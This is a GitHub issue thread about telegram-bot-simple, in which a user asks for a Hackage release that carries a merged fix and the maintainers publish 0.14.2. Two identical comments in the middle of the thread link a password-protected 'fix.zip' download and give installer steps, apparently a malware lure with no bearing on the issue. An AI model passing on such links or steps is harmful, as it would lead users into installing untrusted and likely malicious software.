### ISSUE TITLE
New release needed to push #188 fix to hack/stackage?

### ISSUE THREAD

**Issue by artimath** [fizruk/telegram-bot-simple#190]
Hi, I am going through the Conference Workshop videos.

I ran into https://github.com/fizruk/telegram-bot-simple/issues/188, which was fixed and merged to master in https://github.com/fizruk/telegram-bot-simple/issues/189.

I was only able to get the latest fix by using `extra-deps` to that specific commit.

The last release was ~month before this was fixed. https://github.com/fizruk/telegram-bot-simple/releases/tag/v.0.14.1

Does this package need a new release in order for stackage/hackage/nix to be able to pull a working version?

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fizruk** [comment]
> Does this package need a new release in order for stackage/hackage/nix to be able to pull a working version?

Yes, it appears to be the case. We will try to make a release soon. Thanks for noticing!

**Comment by swamp-agr** [comment]
Hi @artimath, please find release on Hackage: https://hackage.haskell.org/package/telegram-bot-simple-0.14.2
(Please expect haddock in a few hours or tomorrow if it is not autogenerated).

`cabal update` will pick it in an hour or so.

**Comment by swamp-agr** [comment]
@artimath could you please confirm that recent release helped you?
